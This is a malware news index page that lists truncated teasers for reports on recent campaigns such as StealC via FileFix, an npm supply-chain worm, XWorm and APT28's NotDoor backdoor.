Malware

New FileFix variant spreads StealC malware via multilingual phishing site

Cybersecurity researchers are tracking a fresh campaign that uses a new FileFix variant to deliver the StealC information stealer malware. The attack relies on a convincing, multilingual phishing site, advanced obfuscation, and anti-analysis tricks to avoid detection, according to an Acronis researcher, Eliad Kimhy, in a report shared with The Hacker News. How the attack […]

New FileFix variant spreads StealC malware via multilingual phishing site Read More »

Over 180 npm packages targeted by self-replicating worm to steal credentials in recent supply chain attack

Cybersecurity researchers have uncovered a major software supply chain attack targeting the npm registry, compromising more than 180 packages in its initial phase and eventually spreading to over 500 packages. The attack leverages a self-replicating worm, making it one of the most serious threats seen in the JavaScript ecosystem. How the Attack Works The malicious

Over 180 npm packages targeted by self-replicating worm to steal credentials in recent supply chain attack Read More »

TOR-based cryptojacking attack spreads through misconfigured Docker APIs

Cybersecurity experts have recently uncovered an evolved form of a cryptojacking campaign that leverages the TOR network to target misconfigured Docker APIs. Akamai, which identified this activity in August 2025, reported that the attackers attempt to lock down exposed Docker APIs to prevent other threat actors from gaining access. This development expands on Trend Micro’s

TOR-based cryptojacking attack spreads through misconfigured Docker APIs Read More »

GPUGate Malware Leverages Google Ads and Fake GitHub Commits to Target IT Companies

Cybersecurity experts have uncovered a new malware campaign, codenamed GPUGate, that exploits Google Ads and manipulated GitHub commits to deliver malicious payloads. This operation primarily targets IT and software development companies in Western Europe and has been active since at least December 2024. Unlike typical malvertising attacks, this campaign introduces a unique twist. The attackers

GPUGate Malware Leverages Google Ads and Fake GitHub Commits to Target IT Companies Read More »

TAG-150 Hackers Use Custom-Built Malware Families to Target Organizations

A newly identified cyber threat group known as TAG-150 has quickly established itself as a major security concern. Since March 2025, the group has demonstrated the ability to develop and launch multiple custom-built malware families, showcasing both technical skill and rapid evolution. Their arsenal includes CastleLoader, CastleBot, and the latest addition CastleRAT, a sophisticated Remote

TAG-150 Hackers Use Custom-Built Malware Families to Target Organizations Read More »

XWorm Malware Uses New Infection Chain to Evade Detection by Exploiting User and System Trust

Emerging quietly in mid-2025, XWorm has transformed into a highly sophisticated backdoor malware that manipulates both user trust and system conventions to infiltrate networks. Early indications appeared when several organizations reported a surge in phishing emails containing .lnk shortcut files disguised as ordinary documents. Security analysts quickly noticed that opening these shortcuts triggered hidden PowerShell

XWorm Malware Uses New Infection Chain to Evade Detection by Exploiting User and System Trust Read More »

New NotDoor Malware Targets Outlook Users to Steal Data and Compromise Systems

A newly discovered backdoor, linked to the infamous Russian cyber-espionage group APT28 (Fancy Bear), is targeting Microsoft Outlook users. The malware enables attackers to steal sensitive information, upload malicious files, and execute commands to take full control of compromised devices. What is NotDoor? Researchers at LAB52, the threat intelligence division of Spanish cybersecurity firm S2

New NotDoor Malware Targets Outlook Users to Steal Data and Compromise Systems Read More »

MystRodX Exploits DNS and ICMP Channels to Steal Data From Compromised Systems

A newly uncovered backdoor malware known as MystRodX has raised alarms in the cybersecurity community. Operating silently for more than 20 months, this advanced threat has been able to exfiltrate sensitive information using covert communication techniques that bypass standard defenses. Initially mistaken for a Mirai botnet variant, MystRodX is far more dangerous. Instead of relying

MystRodX Exploits DNS and ICMP Channels to Steal Data From Compromised Systems Read More »

Android Droppers Now Deliver SMS Stealers and Spyware, Not Just Banking Trojans

Cybersecurity experts have noticed a notable shift in Android malware campaigns, where dropper apps—traditionally used to deliver banking trojans—are now distributing simpler malicious software such as SMS stealers and lightweight spyware. According to a report by ThreatFabric last week, these campaigns often impersonate government or banking apps in India and other Asian countries. The Dutch

Android Droppers Now Deliver SMS Stealers and Spyware, Not Just Banking Trojans Read More »

ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics

Discovery of New Campaign Cybersecurity experts have identified a fresh phishing operation conducted by the North Korean state-sponsored threat group ScarCruft (APT37). The attackers are using a well-known malware called RokRAT to infiltrate systems and steal sensitive information. Researchers at Seqrite Labs named this campaign Operation HanKook Phantom, noting that the attacks are aimed at

ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics Read More »